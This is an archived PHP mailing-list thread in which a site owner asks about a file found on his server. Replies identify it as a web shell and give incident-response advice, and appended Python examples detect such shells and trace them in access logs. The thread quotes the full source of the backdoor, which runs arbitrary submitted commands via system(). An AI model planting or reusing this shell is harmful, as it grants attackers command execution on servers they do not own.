Re: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???
Looks like it is a PHP script to give people shell access as the web server user.

On Thu, 2003-07-31 at 02:06, Joe Harman wrote:
> I found this on my server... I have no idea what it is... can someone
> tell me what it does...
>
> Thanks
>
> --
> html head titlePHP Shell - CP/title /head
> body bgcolor=#FF text=#33 link=#00 vlink=#00 alink=#00
> h1 align=centerfont size=+4 face=verdanaCrime Perfect/fontbr
> font face=Tahoma size=+1PHP Shell - by _m4st3r_c0d3/font/h1
> ?php
> /* First we check if there has been asked for a working directory. */
> if (isset($work_dir)) {
>   /* A workdir has been asked for - we chdir to that dir. */
>   chdir($work_dir);
>   $work_dir = exec(pwd);
> } else {
>   /* No work_dir - we chdir to $DOCUMENT_ROOT */
>   chdir($DOCUMENT_ROOT);
>   $work_dir = $DOCUMENT_ROOT;
> }
> ?
> form name=myform action=?php echo $PHP_SELF ? method=post
> pbDiretoacute;rio em que vocecirc; estaacute; no momento:
> ?php
> $work_dir_splitted = explode(/, substr($work_dir, 1));
> echo a href=\$PHP_SELF?work_dir= . urlencode($url) . /command= . urlencode($command) . \Root/a/;
> if ($work_dir_splitted[0] == ) {
>   $work_dir = /; /* Root directory. */
> } else {
>   for ($i = 0; $i count($work_dir_splitted); $i++) {
>     /* echo i = $i;*/
>     $url .= /.$work_dir_splitted[$i];
>     echo a href=\$PHP_SELF?work_dir= . urlencode($url) . command= . urlencode($command) . \$work_dir_splitted[$i]/a/;
>   }
> }
> ?
> /b/p
> pbEscolha abaixo o diretoacute;rio em que deseja ir:/b/p
> select name=work_dir onChange=this.form.submit()
> ?php
> /* Now we make a list of the directories. */
> $dir_handle = opendir($work_dir);
> /* Run through all the files and directories to find the dirs. */
> while ($dir = readdir($dir_handle)) {
>   if (is_dir($dir)) {
>     if ($dir == .) {
>       echo option value=\$work_dir\ selectedCurrent Directory/option\n;
>     } elseif ($dir == ..) {
>       /* We have found the parent dir. We must be carefull if the
>          parent directory is the root directory (/). */
>       if (strlen($work_dir) == 1) {
>         /* work_dir is only 1 charecter - it can only be / */
>       } elseif (strrpos($work_dir, /) == 0) {
>         /* The last / in work_dir were the first charecter. This means
>            that we have a top-level directory eg. /bin or /home etc... */
>         echo option value=\/\Parent Directory/option\n;
>       } else {
>         /* We do a little bit of string-manipulation to find the parent
>            directory... Trust me - it works :-) */
>         echo option value=\. strrev(substr(strstr(strrev($work_dir), /), 1)) .\Parent Directory/option\n;
>       }
>     } else {
>       if ($work_dir == /) {
>         echo option value=\$work_dir$dir\$dir/option\n;
>       } else {
>         echo option value=\$work_dir/$dir\$dir/option\n;
>       }
>     }
>   }
> }
> closedir($dir_handle);
> ?
> /select
> pbDigite abaixo os comandos que deseja executar:/b/p
> input type=text name=command size=60 ?php if ($command) { echo value=\$command\;} ?
> input name=submit_btn type=submit value=Execute Command/p
> pLigar/Ativar codestderr/code-trapping? input type=checkbox name=stderr/p
> pbAbaixo, terminal onde apareceraacute; os resultados dos comandos que vocecirc; executou/b/p
> p textarea cols=80 rows=20 readonly
> ?php
> if ($command) {
>   if ($stderr) {
>     system($command . 1 /tmp/output.txt 21; cat /tmp/output.txt; rm /tmp/output.txt);
>   } else {
>     system($command);
>   }
> }
> ?
> /textarea /p /form
> pbCrime Perfect 2003 /b/p
> pbBy _m4st3r_c0d3 - #crimeperfect/b/p
> /div /body /html
>
> Joe Harman
> http://www.HarmanMedia.com
>
> Only two things are infinite, the universe and human stupidity, and I'm
> not sure about the former. - Albert Einstein

--
-~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~-
John Coggeshall
http://www.coggeshall.org/
john at coggeshall dot org
The PHP Developer's Handbook
The definitive PHP5 developer's guide
http://www.php-handbook.com/
-~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~-

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
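A triage heuristic for finding files like the quoted one, added here as an example and not part of the original thread: it flags PHP shell-execution calls whose argument is a request superglobal or a variable the file never assigns, which is how `$command` reaches `system()` in the script above when `register_globals` is on. The sample sources and the function name are constructed for illustration.

```python
import re

# Constructed samples. SUSPECT mirrors the calls in the quoted script: under
# register_globals, $command and $work_dir arrive straight from the request.
SUSPECT = """<?php
if (isset($work_dir)) {
    chdir($work_dir);
    $work_dir = exec("pwd");
}
if ($command) {
    system($command);
}
?>"""
BENIGN = """<?php
$cmd = "uptime";
system($cmd);
$load = shell_exec("cat /proc/loadavg");
?>"""

SINK = re.compile(r"\b(system|exec|passthru|shell_exec|popen|proc_open)\s*\((.*)")
VARIABLE = re.compile(r"\$(\w+)")
ASSIGNMENT = re.compile(r"\$(\w+)\s*\.?=(?!=)")  # $x = ... and $x .= ..., not ==
SUPERGLOBALS = {"_GET", "_POST", "_REQUEST", "_COOKIE",
                "HTTP_GET_VARS", "HTTP_POST_VARS"}


def request_fed_sinks(source):
    """Return (line number, function, variable) for every shell-executing call
    whose argument uses a request superglobal or a variable that the file
    itself never assigns."""
    assigned = set(ASSIGNMENT.findall(source))
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        call = SINK.search(line)
        if not call:
            continue
        for name in VARIABLE.findall(call.group(2)):
            if name in SUPERGLOBALS or name not in assigned:
                hits.append((number, call.group(1), name))
    return hits


if __name__ == "__main__":
    print(request_fed_sinks(SUSPECT))
    print(request_fed_sinks(BENIGN))
```

Function parameters are also never assigned in this sense, so wrapper functions produce false positives; treat a hit as a file to read, not as a verdict.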
Re: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???
trolling! ha

binc2 wrote:
> Hi guys what does trolling mean? Never heard of it before.
>
> Angelo
>
> -Original Message-
> From: Joel Rees [EMAIL PROTECTED]
> To: Joe Harman [EMAIL PROTECTED], [EMAIL PROTECTED]
> Date: Thu, 31 Jul 2003 16:10:24 +0900
> Subject: Re: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???
>
> Assuming you are not just trolling,
>
> > Fortunately I don't think they were doing something correctly, cause
> > it didn't deface my site like some of the others
>
> Don't count on it. They only deface servers they don't want to use.
>
> > ... everyone can execute shell commands via system(); on your server.
> > - delete the script ;)
>
> Oh, by all means, delete it if you want. But it's not the hole it came
> in through, and it's not the real backdoor. It's so blatant, I'd guess
> it's a script kiddy or a decoy. Even if it's a script kiddy, you _want_
> to know how it got on the box.
>
> I'd take the box offline, back up all the data and configuration files,
> and re-install the whole system and all programs from scratch. Go over
> every configuration file with a fine-tooth comb.
>
> If the machine is on a subnet and I controlled the subnet, I think I'd
> take the whole subnet down, including the firewall, and clean every
> machine up, not putting any machine back on the subnet until it was
> clean and any holes patched. If I didn't control the subnet, I'd make
> sure the persons who did know there had been a break-in.
>
> And if you have any valuable data, consider it to have been stolen. If
> you have credit card numbers, report the possibility of theft to the
> credit card companies. Etc.
>
> If you're trolling, go away.
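One way to follow up on "you _want_ to know how it got on the box", added here as an example and not part of the original thread: it finds requests in a web server access log that carry the quoted script's `work_dir` and `command` parameters, then lists what the same clients requested before their first hit on that script. The log lines, paths and addresses are constructed.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Constructed sample in Apache common log format; paths and addresses are hypothetical.
SAMPLE_LOG = """\
198.51.100.7 - - [30/Jul/2003:21:14:02 +0000] "GET /index.php HTTP/1.0" 200 5120
203.0.113.9 - - [30/Jul/2003:23:40:11 +0000] "POST /gallery/upload.php HTTP/1.0" 200 312
203.0.113.9 - - [30/Jul/2003:23:41:03 +0000] "GET /gallery/files/cp.php HTTP/1.0" 200 2048
203.0.113.9 - - [30/Jul/2003:23:41:30 +0000] "GET /gallery/files/cp.php?work_dir=%2Fetc&command=id HTTP/1.0" 200 2101
203.0.113.9 - - [30/Jul/2003:23:42:10 +0000] "POST /gallery/files/cp.php HTTP/1.0" 200 2230
""".splitlines()

LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*" (\d{3})')
SHELL_PARAMS = {"work_dir", "command"}  # parameter names read by the quoted script


def parse(lines):
    """Yield (time, client, method, split URL, status) for each parsable line."""
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            ip, ts, method, url, status = m.groups()
            when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
            yield when, ip, method, urlsplit(url), int(status)


def triage(lines):
    events = sorted(parse(lines), key=lambda e: e[0])
    # 1. Paths requested with the shell's parameter names in the query string.
    shell_paths = {u.path for _, _, _, u, _ in events
                   if SHELL_PARAMS.intersection(parse_qs(u.query, keep_blank_values=True))}
    # 2. First hit per client on those paths; POSTed commands carry no query
    #    string, so match on the path rather than on the parameters.
    first_hit = {}
    for when, ip, _, u, _ in events:
        if u.path in shell_paths:
            first_hit.setdefault(ip, when)
    # 3. What each of those clients requested before its first shell hit:
    #    the candidates for how the file got onto the server.
    lead_up = {ip: [(m, u.path, s) for w, c, m, u, s in events
                    if c == ip and w < t0 and u.path not in shell_paths]
               for ip, t0 in first_hit.items()}
    return shell_paths, first_hit, lead_up


if __name__ == "__main__":
    for item in triage(SAMPLE_LOG):
        print(item)
```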